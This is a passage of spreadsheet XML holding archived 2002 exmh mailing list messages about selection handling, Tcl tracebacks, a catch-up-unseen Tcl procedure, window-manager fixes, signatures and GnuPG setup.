with 8 lines that work for everyone, or perhaps introduce yet another
setting that lets folks choose between a few useful models.  Of course,
that's an admission of policy failure, but I'm willing to do that.--
Brent Welch
Software Architect, Panasas Inc
Pioneering the World's Most Scalable and Agile Storage Network
www.panasas.com
welch@panasas.com_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Sun, 22 Sep 2002 22:21:49 -0700
    From:        Brent Welch 
    Message-ID:  &lt;200209230521.BAA11218@blackcomb.panasas.com&gt;  | I would encourage folks to play with those 10 lines of code in
  | Text_Selection and report what works well for them.  We may come up
  | with 8 lines that work for everyone, or perhaps introduce yet another
  | setting that lets folks choose between a few useful models.  Of course,
  | that's an admission of policy failure, but I'm willing to do that.I actually think you're looking in the wrong place.   I, at least,
have almost no problems with the choice of what gets pasted, or
selected, that stuff (for me, if perhaps not users of some gnome variant,
which appraently has been fixed anyway) all seems to work just fine.The problem is that a button 1 click clears the selection (PRIMARY)
where it shouldn't - the previous selection should only be cleared
when there's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string).Then, because of the "if I get asked for the selection value, I will
find something" behaviour, if you click (intending to set the insert
point, the way most other GUI's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that.That behaviour, to me anyway, is the real issue.Once that gets fixed, we can switch back to operating the normal
"select stuff, click at new insert point, paste" mode of operation
that almost everyone expects to work (whether the "select stuff"
is somewhere in one of the exmh windows, or elsewhere).kreps: this message is from my experience as a exmh user only, I've never
really understood enough about X and selections to go gazing at that
part of the code and see how it all really operates._______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Oops - turns out i wasn't careful installing it, so the exmh(library)
variable was pointing at my old installation.  I'm surprised it worked
as well as it did.In any case, I removed the old library directory, and edited exmh,
exmh-bg, exmh-strip, etc to point at the right one.  Now I'm getting
another traceback on startup:can't read "mhPriv(pubseq,family,cur)": no such variable
    while executing
"MhSeq $folder $seq add $mhPriv(pubseq,$folder,$seq) [MhSeqExpand
$folder $msgids"
    (procedure "MhReadSeqs" line 73)
    invoked from within
"MhReadSeqs $folder seqs"
    (procedure "Mh_Sequences" line 2)
    invoked from within
"Mh_Sequences $folder"
    (procedure "Flist_UnseenUpdate" line 4)
    invoked from within
"Flist_UnseenUpdate $folder"
    (procedure "FolderChange" line 51)
    invoked from within
"FolderChange family {Msg_Show cur}"
    invoked from within
"time [list  FolderChange $folder $msgShowProc"
    (procedure "Folder_Change" line 3)
    invoked from within
"Folder_Change $exmh(folder)"
    (procedure "Exmh" line 101)
    invoked from within
"Exmh"
    ("after" script)
+family is the folder I was in when I quit exmh.I'm on a remote display right now, and its really slow.  I'll have to
play with it more tonight when I get home to see if there are any
other problems. Scott&gt; &gt; From:  Scott Lipcon 
&gt; &gt; Date:  Sun, 22 Sep 2002 22:58:16 -0400
&gt; &gt;
&gt; &gt; I just updated to the latest CVS - I had been running a build from June.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&gt; 
&gt; Chris
&gt; 
&gt; -- 
&gt; Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
&gt; virCIO                          http://www.virCIO.Com
&gt; 716 Congress, Suite 200
&gt; Austin, TX  78701		+1 512 374 0500
&gt; 
&gt;   World War III:  The Wrong-Doers Vs. the Evil-Doers.
&gt; 
&gt; 
&gt; 
&gt; 
&gt; --==_Exmh_1988991284P
&gt; Content-Type: application/pgp-signature
&gt; 
&gt; -----BEGIN PGP SIGNATURE-----
&gt; Version: GnuPG v1.0.6 (GNU/Linux)
&gt; Comment: Exmh version 2.2_20000822 06/23/2000
&gt; 
&gt; iD8DBQE9jygSK9b4h5R0IUIRAix6AJ9CorKpwn/5KatPB2QytCyr1mVP5QCfd84d
&gt; CBV9usxWABobTcDTVHm8fLY=
&gt; =xJhj
&gt; -----END PGP SIGNATURE-----
&gt; 
&gt; --==_Exmh_1988991284P--
&gt; _______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; How easy would it be to code a menu item that marks as read all messages 
&gt; before the current message?  I often have problems reading heavy-traffic 
&gt; mailing lists in exmh because I want to read only a subset of a lists 
&gt; messages, but I lose track of where I was in the particular folder.  
&gt; 
&gt; This could also be coded more generally in the new sequences code as a way to 
&gt; remove all messages before current from a particular sequence.Easy.First, you'll have to excuse me as I'm still using 2.3.1 (*), so, this
may not play well with recent changes.  (I did look at 2.5.1, too).
And, I just did this off the top of my head (I wanted to see if it
(**) still worked), so this is somewhat untested.Adding a menu entry is trivial; add this to your ~/.exmh/exmh-defaults:*Fops.more.m.uentrylist:	ketchup
*Fops.more.m.l_ketchup:		Catch-up all b4 cur
*Fops.more.m.c_ketchup:	 	My_Mark2CurSeenThen you just need to provide the source for My_Mark2CurSeen and 
arrange for Exmh to include it (put it in your ~/.tk/exmh directory
in your user.tcl; or in pick.patch if you enable the "source hook"
under Prefs-&gt;Hacking Support)It's going to look something like this:proc My_Mark2CurSeen {} {
    global exmh pick msg
    Exmh_Status "Clearing unseen up to cur..." red
    Mh_SetCur $exmh(folder) $msg(id)
    set pick(ids) [...get message ids for "pick 1-cur"...]
    busy PickMarkSeen
    Exmh_Status ok blue
}(that's based upon the guts of Pick_MarkSeen)You need to fill in the code for the [...get...] section; I ran out of
time!John(*) "It just works" (tm)
(**) "it" == my head_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
cwg-dated-1033065967.2dc492@DeepEddy.Com said:
&gt; From:  Chris Garrigues 
&gt; Date:  Wed, 28 Aug 2002 11:07:01 -0500 &gt;
&gt; Here's a fix that I think will make a real difference.
&gt; 
&gt; Ftoc_ShowSequences needs to be able to be called with an optional
&gt; list of msgids 
&gt; to update and if it's called that way it only removes or adds tags
&gt; for those 
&gt; messages.  Then in places like MsgChange, we only update the
&gt; messages which have
&gt; changed.
&gt; 
&gt; Also, a separate Ftoc_ShowSequence function which only updates the
&gt; display of 
&gt; one sequence should be written which also takes an optional list of
&gt; msgids.
&gt;   
&gt; In a place like MsgChange, it would only need to update the cur
&gt; sequence.
&gt; 
&gt; If nobody else gets to it, I'll do this when I get back.&gt; I just checked this in.  Let me know if it helps.&gt; Chris Congratulations Chris, you just made the hall of fame!! Speed is much better now. I haven't done any tests, but I'd say that latency dropped 2-3 times and we're back in good shape again.Well done!/Anders_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
It seems that something changed during the last 3-4 weeks.1) In a folder, msgs 1-n is read, n=current, n upwards is unread.
2) change to another folder
3) change back to the original folder and you'll see msg n+1 being 
highlighted as current for a split second, that it changes back to 
n=current.Kind of annoying since it marks msg n+1 as read./Anders_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;
&gt;	I'll have to try it with another window manager and see if I can
&gt;get exmh to put it back inside of sane boundaries. I don't have this
&gt;problem with any other windows, though. Just the exmhunseen window.
&gt;How about enabling the "Show unseen message count in folder cache"
option? It displays the number of unseen messages next to each folder name
(if greater than 0), so you don't really need the unseen window unless
you're using more sequences than just "unseen".Paul_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; On Fri, 27 Sep 2002, "Paul" == Paul Menage wrote:  Paul&gt; so you don't really need the unseen window unless you're
  Paul&gt; using more sequences than just "unseen".I use a virtual window manager and keep the main exmh window and 
the detached folder list on one virtual desktop but the unseen 
window is set to show on all desktops.Got no help for the problems, but just pointing out why some of 
us find the unseen window invaluable.
--Hal
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">In article  you write:
&gt;&gt;&gt;&gt; Patrick Salsbury writes:
&gt;
&gt;  Patrick&gt; One of the features I really like about exmh is the
&gt;  Patrick&gt; ability to see which folders have unseen messages in
&gt;  Patrick&gt; them, but recently, it seems to have vanished into the
&gt;  Patrick&gt; bowels of my window manager in a place I can't get
&gt;  Patrick&gt; to. It claims to be running, but doesn't appear
&gt;  Patrick&gt; anywhere onscreen. (I'm using Enlightenment with a 2x2
&gt;  Patrick&gt; virtual desktop. I've tried dropping it to only 1
&gt;  Patrick&gt; screen. No help.)
&gt;  Patrick&gt;
&gt;
&gt;This may not help/work but I've discovered recently that
&gt;Alt-middle-mouse pops up a list of all of my windows.  If I leave
&gt;my mouse on the background, it lists Alt-middle-mouse as "Display
&gt;Task List Menu".
&gt;
&gt;HTH,
&gt;
&gt;- Bill
	When I do that, it just moves my mouse to the very edge of a window
(probably trying to center it on the off-screen window in question.) 	I'll have to try it with another window manager and see if I can
get exmh to put it back inside of sane boundaries. I don't have this
problem with any other windows, though. Just the exmhunseen window.Pat_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1In article  you write:
&gt;&gt;
&gt;&gt;	I'll have to try it with another window manager and see if I can
&gt;&gt;get exmh to put it back inside of sane boundaries. I don't have this
&gt;&gt;problem with any other windows, though. Just the exmhunseen window.
&gt;&gt;
&gt;
&gt;How about enabling the "Show unseen message count in folder cache"
&gt;option? It displays the number of unseen messages next to each folder name
&gt;(if greater than 0), so you don't really need the unseen window unless
&gt;you're using more sequences than just "unseen".
&gt;
&gt;Paul
&gt;
	As Hal noted, I like to have the unseen window visible in all
virtual desktops, even if the main window is minimized. However, I looked
through ALL the preferences menus, and didn't see anything resembling "Show
unseen message count in folder cache". Where is that? And in what version?
(I'm running v2.4 - 06/23/2000 - Creaky, I know.)	I went into twm with no virtual desktops, and it came up just fine.
Going back to Enlightenment I saw the same behavior as before. Then I knew
it MUST be something in the window manager, so I went digging. in my 
~/.englightenment/...e_session-XXXXXX.snapshots.0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section:NEW: exmh.Exmh
NAME: exmh
CLASS: Exmh
NEW: unseen.UnseenWin
NAME: unseen
CLASS: UnseenWin
DESKTOP: 0
RES: 1600 1200
WH: 114 173
XY: 1655 150 0 0
LAYER: 4
STICKY: 1
SKIPTASK: 0
SKIPWINLIST: 0
SKIPFOCUS: 0
SHADE: 2
BORDER: PAGER_LEFT_BLUE	I changed:
XY: 1655 150 0 0  	to 
XY: 1455 150 0 0	so it would reappear in my viewable space,
restarted Enlightenment (CTRL-ALT-End) and then restarted exmh. Bingo!
There was my window! 	I quickly told Englightenment to forget everything about that
window except is border style, and now have a sveldt little entry like so:NEW: exmh.Exmh
NAME: exmh
CLASS: Exmh
NEW: unseen.UnseenWin
NAME: unseen
CLASS: UnseenWin
BORDER: PAGER_LEFT_BLUE	Completely an Enlightenment problem, not exmh. (Though I wonder how
it got mixed up in the first place? I certainly can't move a window off
screen like that. Unless it was part way over then snapped offscreen when
shading.)	Hmm. Weird. 	Anyway, thanks for the suggestions, folks. Hopefully this will be
useful to someone scouting the archives in the future... :-) -----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.2
Comment: Don't know what PGP is? Check http://www.pgpi.org/iQA/AwUBPZayRIJkhJBJYtPQEQIyzgCg/mMMlKnmP8Cxa/h7b5X0KrJXsLsAoO1N
6dm1Hpj6RnUGPjuUQItBYEC3
=OL5H
-----END PGP SIGNATURE-----_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1Content-Type: text/plain; charset=us-asciiAfter a bit of peeking through the exmh tcl and playing with tcl a bit, I got 
the "catchup unseen messages before cur" procedure working.  Here's the code 
for everybody and the list archives in case anyone wants it in the future.  
Thanks to John R. LoVerso for putting me on the right track.  proc My_Mark2CurSeen {} {
    global exmh pick msg
    set results {}
    Exmh_Status "Clearing unseen up to cur..." red
    Mh_SetCur $exmh(folder) $msg(id)
    set unseen [Mh_Unseen $exmh(folder)]
    foreach elem $unseen {
         if { $elem &lt; $msg(id) } {
            lappend results $elem
         }
    }
    set pick(ids) $results
    busy PickMarkSeen
    Exmh_Status ok blue
}If you want to use this, stick it in your .tk/exmh directory, run auto_mkindex 
on it and add the following lines to your .exmh/exmh-defaults:
*Fops.more.m.uentrylist:        ketchup
*Fops.more.m.l_ketchup:         Catch-up all before current
*Fops.more.m.c_ketchup:         My_Mark2CurSeen-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07/13/2001iD8DBQE9mJ6XoayJfLoDSdIRAkaQAJ9NL83MUU6bJRB19x7MgRaDQhc3ZwCfRK5d
PXat04+AnSx4tHjn5p8mZVc=
=sJtk
-----END PGP SIGNATURE-----_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; On Mon, 30 Sep 2002, "Ted" == Ted Cabeen wrote:  Ted&gt; Here's the code for everybody and the list archives in
  Ted&gt; case anyone wants it in the future.Very cool!  I vote for this being added to CVS, any objections?--Hal
_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1Content-Type: text/plain; charset=us-asciiIn message &lt;3703.1033415613@dimebox.bmc.com&gt;, Hal DeVore writes:
&gt;&gt;&gt;&gt;&gt;&gt; On Mon, 30 Sep 2002, "Ted" == Ted Cabeen wrote:
&gt;
&gt;  Ted&gt; Here's the code for everybody and the list archives in
&gt;  Ted&gt; case anyone wants it in the future.
&gt;
&gt;Very cool!  I vote for this being added to CVS, any objections?Not from me, although you probably want to change the name of the procedure.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07/13/2001iD8DBQE9mK24oayJfLoDSdIRAs21AKDYeoDgFYgSUldYusaLxJTbcsPxuQCdHaFG
Z4P4FqmRJlqCbvmKFJMNgJI=
=dC6l
-----END PGP SIGNATURE-----_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Mon, 30 Sep 2002 14:53:33 -0500
    From:        Hal DeVore 
    Message-ID:  &lt;3703.1033415613@dimebox.bmc.com&gt;  | I vote for this being added to CVS, any objections?No, but using PickMarkSeen (and pick(ids)) as an alternative to
just doing	Seq_Del $exmh(folder) $mhProfile(unseen-sequence) $resultsseems unnecessary to me (that's all that PickMarkSeen does after all).
(That can be done via "busy")Of course, the same is true of the badly named Pick_MarkSeen which has
nothing at all to do with "pick" except that it (ab)uses the pick(ids) var
in the same way.   (Its name would be hard to change unfortunately, as it
is known in app-defaults files for the "Catch Up Unseen" menu item, but
its implementation could certainly be fixed).kre_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
I apologize for not catching up to the current code in so long.Now that I have I'm trying to resolve "breakage" and differences.The unseen window seems to have been replaced with the sequences 
window.  While I appreciate the flexibility of the sequences 
window, the unseen window filled an important-to-me need:  It 
was tiny and could be set to show on all desktops of a virtual 
window manager without taking a lot of space.  Since my normal 
mode of operation involves two copies of exmh displaying on a 
1024x768 vnc session, screen space is at a premium.As things stand now, I have a sequences window that shows a lot
more information than I need to have handy and takes up a lot 
more room than I can "spare".I can see that I could like the new sequences window a lot for 
certain operations.  But I'd like a nice uncluttered, tiny 
window that _only_ shows me info on my unread mail.One possibility that occurs to me would be a button or mouse
click that "shrinks" the Sequences window to show only the
sequences in the "always show" list.  And of course a way to 
expand it back.--Hal
_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">I've had this binding in my ~/.exmh/exmhbindings for years:set {bindings(key,Flist_FindUnseen 1 ; Inc_PresortFinish)} After updating to the current code in CVS I get "bad key f" when 
I hit the "f" key.  I can open the Bindings... Commands window 
and define the binding.  It then works until I restart exmh.I suspect a parsing problem/change.  I'll try to look into this 
tomorrow unless someone knows where the problem might be.--Hal
_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
I have a couple of small issues, and I'm not sure if their exmh issues
or my setup issues.First, when I try and run exmh with wish from tk8.4.0 it seems to take
forever to start, but with wish from tk8.a.4 it starts in a snap.Using the latest CVS, when I open exmh and the folder I'm in has unseen
messages and I hit next, exmh changes to the next folder with unseen messages
rather than to the first unseen in the current folder.Finally, when I reach the end of the messages in a folder and go on to
the next unseen, exmh always goes back to inbox (which has no unseen
messages) rather than the next folder with unseen messages.  (When I 
goto next from inbox it does go where I would think it should go).Just wanted to let you know what I'm seeing and find out if I'm expecting
some different than I should be.Thanks for all the effortJim
_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;&gt;&gt;&gt; On Wed, 2 Oct 2002, "Chris" == Chris Garrigues wrote:  Chris&gt; I'm not sure I'll get to it any time soon.Well, you have a pretty good idea of when I might get to it (the 
phrase hell freezes over comes to mind)... so whenever you can 
will certainly be fine.Thanks for considering it.  In the meantime I've set the 
"minimum entry lines" to 1.  It certainly isn't going to make me 
go back to the old version.--Hal
_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; On Wed, 2 Oct 2002, "Chris" == Chris Garrigues wrote:  Chris&gt; Flist_FindUnseen has changed to Flist_FindSeqs.I guess I was sleepier than I thought.  I managed to cut and
paste the _right_ stuff from the app-defaults file into the
Bindings definition dialog without ever noticing that it was
different from what was in my exmhbindings file.--HalP.S., can I get a pointer to a freeware Tcl/Tk debugger?
_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Wed, 02 Oct 2002 11:39:13 -0500
    From:        Hal DeVore 
    Message-ID:  &lt;9288.1033576753@dimebox.bmc.com&gt;  | Restarting exmh was necessary.Probably not.   Next time try clicking on the folder name in the
sequences window for the sequence.   That is, request that sequence
be the one displayed in the FTOC.   If the sequence doesn't exist,
it will be cleaned up then.Perhaps it would be nicer if flist would do it as well, but this
is effective enough.kre_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
[I wrote this last night but it appears I never sent it... still 
haven't had time to dig in to it...]
&gt;&gt;&gt;&gt;&gt; On Tue, 1 Oct 2002, "Robert" == Robert Elz wrote:  Robert&gt; No, but using PickMarkSeen (and pick(ids)) as an
  Robert&gt; alternative to just doing  Robert&gt; Seq_Del $exmh(folder) $mhProfile(unseen-sequence) $results
Ah.  Neither Ted nor I were particularly up to date.  I pulled 
down the lates from CVS and am now running with it.  I miss the 
blue ftoc lines but I'll sort that out soon, iirc Chris said 
it's a simple resource change.Ted's code to "ketchup" made use of some of the procs that went 
away in the sequence generalization.  I've fixed it up... almost 
and it looks like this now:proc Cabeen_Mark2CurSeen {} {
    global exmh mhProfile msg
    set results {}
    Exmh_Status "Clearing unseen up to cur..." red
    Mh_SetCur $exmh(folder) $msg(id)
    set unseen [Mh_Sequence $exmh(folder) $mhProfile(unseen-sequence) ]
    foreach elem $unseen {
         if { $elem &lt;= $msg(id) } {
            lappend results $elem
         }
    }
    busy Seq_Del $exmh(folder) $mhProfile(unseen-sequence) $results
    Exmh_Status ok blue
}
The "almost" is because it's not updating the highlighting on 
the ftoc.  I'm too tired to go figure out how to fix that just 
now and have to move on to other stuff.  If someone wants to 
forward me a clue feel free.Now that I've got all of Chris' sequence stuff I discovered that 
my sequences are ... cluttered.--Hal
_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hi,succeeded in ringing a bell anytime I get a mail
to my inbox (Not Mailing lists, spams etc.) by
using procmail to execute a "play clink.wav" on
the "right" mails.
Now my demands are growing ;-)
I use my laptop remotely very often and now I would
like the bell to sound on that when I am there.
I triedto use the KDE remote sound server and it works in
the tests, but when procmail runs it it doesn't, presumably
as it doesn't have the authorization to communicate with
the laptop, beeing another user?Any hints.BRGDS
-- 
Dag Nygren                               email: dag@newtech.fi
Oy Espoon NewTech Ab                     phone: +358 9 8024910
TrÃ¤sktorpet 3                              fax: +358 9 8024916
02360 ESBO                              Mobile: +358 400 426312
FINLAND
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; 
&gt; 
&gt; &gt;&gt;&gt;&gt;&gt; On Tue, 8 Oct 2002, "Dag" == Dag Nygren wrote:
&gt; 
&gt;   Dag&gt; but when procmail runs it it doesn't, presumably as it
&gt;   Dag&gt; doesn't have the authorization to communicate with the
&gt;   Dag&gt; laptop, beeing another user?
&gt; 
&gt; I don't know anything about the KDE sound server but I'd guess 
&gt; your problem is the "environment" in which procmail runs.  You 
&gt; don't say what procmail is running from.  In my case, for 
&gt; example, procmail is run from fetchmail which is run by a cron 
&gt; job.Sorry about that,
procmail is run by the qmail delivery agent to presort all mail
I get.
But anyway, I found an error message in procmail.log, which solved
the problem.
The following line in my delivery script seems to work fine now:DISPLAY=:0.0 artsplay ThanksDag
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t>On Wed Aug 21 2002 at 15:46, Ulises Ponce wrote:&gt; Hi!
&gt; 
&gt; Is there a command to insert the signature using a combination of keys and not
&gt; to have sent the mail to insert it then?I simply put it (them) into my (nmh) component files (components,
replcomps, forwcomps and so on).  That way you get them when you are
editing your message.  Also, by using comps files for specific
folders you can alter your .sig per folder (and other tricks).  See
the docs for (n)mh for all the details.There might (must?) also be a way to get sedit to do it, but I've
been using gvim as my exmh message editor for a long time now.  I
load it with a command that loads some email-specific settings, eg,
to "syntax" colour-highlight the headers and quoted parts of an
email)... it would be possible to map some (vim) keys that would add
a sig (or even give a selection of sigs to choose from).And there are all sorts of ways to have randomly-chosen sigs...
somewhere at rtfm.mit.edu... ok, here we go:
rtfm.mit.edu/pub/usenet-by-group/news.answers/signature_finger_faq.
(Warning... it's old, May 1995).&gt; Regards,
&gt; UlisesHope this helps.Cheers
Tony_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Wed, 21 Aug 2002 10:40:39 -0500
    From:        Chris Garrigues 
    Message-ID:  &lt;1029944441.398.TMDA@deepeddy.vircio.com&gt;  | The background color in this window is the same as the background 
  | color in the ftoc.That's what I'd like to vary - particularly as the ftoc background isn't
constant - messages in the unseen sequence have a different background
than others.In the ftoc that's fine, but in the sequences window, it isn't needed.
unseen already has a different foreground there (no problem with that),
it doesn't need a different background as well.I'll play about a bit with this, and with making it vertical instead of
horizontal, and see what turns up.  | The only sequences that are defined there are sequences which are defined
  | in app-defaults-color or ~/exmh/exmh-defaults-color.OK.  | I've been thinking about how to dynamically generate highlighting for
  | other sequences, but haven't got that figured out yet.In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you.Done some of that.   First, the most significant change came from changing
relief from raised to sunken.   I don't know why, but it just looks better
(for me anyway).   But even with that, cur and unseen are still just a
bit too similar.   I ended up using*sequence_cur:  -background {PaleGoldenrod} -relief sunken -borderwidth 2The unnecessary braces are just because some of the colours I was using
had spaces in their names.   PaleGoldenrod translates as #eee8aa which
is probably safer for generic use.kre_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;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18:51:31 lists/l-k has 5 msgs in unseen
18:51:31 lists/l-k has 4 msgs in unseen
18:51:31 lists/l-k has 3 msgs in unseen
18:51:31 lists/l-k has 2 msgs in unseen
18:51:31 lists/l-k has 1 msgs in unseen
18:51:31 lists/l-k has 0 msgs in unseen
18:51:31 FlistUnseenFolder lists/l-k
18:51:31 ok
18:51:47 Folder_Change lists/exmh {Msg_Show cur}_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t xml:space="preserve">
Oooops!Doesn't work at all. Got this on startup and on any attempt to change folder (which fail)/Anderscan't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script)_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t>In a message dated: Thu, 22 Aug 2002 13:03:57 CDT
Ulises Ponce said:&gt;Thanks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this).However, the signature gets added on send, not inserted directly into 
the existing Sedit window prior to composition.I currently have 6 different sig files I can choose between.Additionally, if a .signature file has the execute bit turned on, 
exmh will attempt to execute the file and use the stdout of the 
script as your signature.I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</si>
  <si>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Thanks Paul,
That is the way I am doing right now, but I would like to NOT use the mouse 
for such things. Any other clue?--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</si>
  <si>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Just got this ... I was just reading mail, but in a very dark
room, where the keyboard is illuminated mostly by the light from
the (laptop) screen.   I think I put my fingers on the wrong keys.
(I mostly use the keyboard exclusively while running exmh).This is from today's cvs (the fixes for the problems I mentioned
yesterday are included) - I eventually managed to contact the cvs
server.expected integer but got ""
    while executing
"incr m"
    (procedure "MhSeqExpand" line 12)
    invoked from within
"MhSeqExpand $folder $msgids"
    (procedure "MhSeq" line 2)
    invoked from within
"MhSeq $folder $seq $how $oldmsgids $msgids"
    (procedure "Mh_SequenceUpdate" line 54)
    invoked from within     
"Mh_SequenceUpdate $folder replace $seq $msgids"
    (procedure "Seq_Set" line 4)
    invoked from within             
"Seq_Set $folder cur $msgid"
    (procedure "Mh_SetCur" line 7)      
    invoked from within                     
"Mh_SetCur $exmh(folder) $msgid"
    (procedure "MsgChange" line 5)              
    invoked from within                             
"MsgChange - noshow"
    invoked from within                                 
"time [list MsgChange $msgid $show"
    (procedure "Msg_Change" line 3)
    invoked from within                                     
"Msg_Change $select(sel) noshow"
    (procedure "SelectTypein" line 14)                          
    invoked from within
"SelectTypein .mid.right.top.msg -"
    (command bound to event)kreps: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I'm just embedding stuff in the code, much quicker for prototyping.  Once
its done, I'll send a patch for someone to look over._______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t>In a message dated: Thu, 22 Aug 2002 13:53:55 CDT
Ulises Ponce said:&gt;Thanks Paul,
&gt;That is the way I am doing right now, but I would like to NOT use the mouse 
&gt;for such things. Any other clue?The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</si>
  <si>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 xml:space="preserve">
&gt;&gt;&gt;&gt;&gt; On Thu, 22 Aug 2002, "Chris" == Chris Garrigues wrote:  Chris&gt; --==_Exmh_267413022P Content-Type: text/plain;
  Chris&gt; charset=us-ascii  +&gt; From:  Anders Eriksson  Date:  Thu, 22 Aug
  +&gt; 2002 20:23:17 +0200  +&gt; Oooops!  +&gt; Doesn't work at all. Got this on startup and on any attempt to
  +&gt; change folde r (which fail)  Chris&gt; ~sigh~ I'd already found that and checked it in....apparently
  Chris&gt; I did so after you checked it out and before you sent this
  Chris&gt; mail...I hoped I was fast enough that you wouldn't see it.  Chris&gt; Try again!
Works like a charm. It's like the box was on drugs or something. However, while testing it a selected my favourite folder (l-k) and 
marked ~400 messages unread. THAT took forever, or about as long as 
Catch-up Unseen did before. Any suggestions?/A
_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Fri, 23 Aug 2002 02:05:19 +0700
    From:        Robert Elz 
    Message-ID:  &lt;16323.1030043119@munnari.OZ.AU&gt;When I said ...  | This is from today's cvsthat will translate as  "yesterday's" now of course (before the most
recent set of changes (catchup speedups, and so on)).kre_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t>HELP.
I had GPG working.
I updated from version gnupg-1.0.6 to gnupg-1.0.7.
This moved gpg from /usr/bin to /usr/local/bin and I changed the path
in the exmh 'executable'.With that fix, EXMH knows I have GPG, and puts the line	Check the signature with GnuPGin messages with GnuPG signatures.  But punching the line ALWAYS
gives        Signature made Thu Aug 29 00:27:17 2002 MDT using DSA key ID BDDF997A
        Can't check signature: public key not foundSo, something else is missing.
Can somebody tell me what it is,- Ive tried grepping on everything
that I can think of with no luck at all.
-- 
                                        Reg.Clemens
                                        reg@dwf.com
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users</t>
  </si>
  <si>
    <t xml:space="preserve">
BTW:  I remember messing about with such things long ago.  One 
problem I ran into was making sure that no attempt was made to 
play a sound when either:a)  the screen was locked
  or
b)  no exmh was running.Just something to think about, Dag.
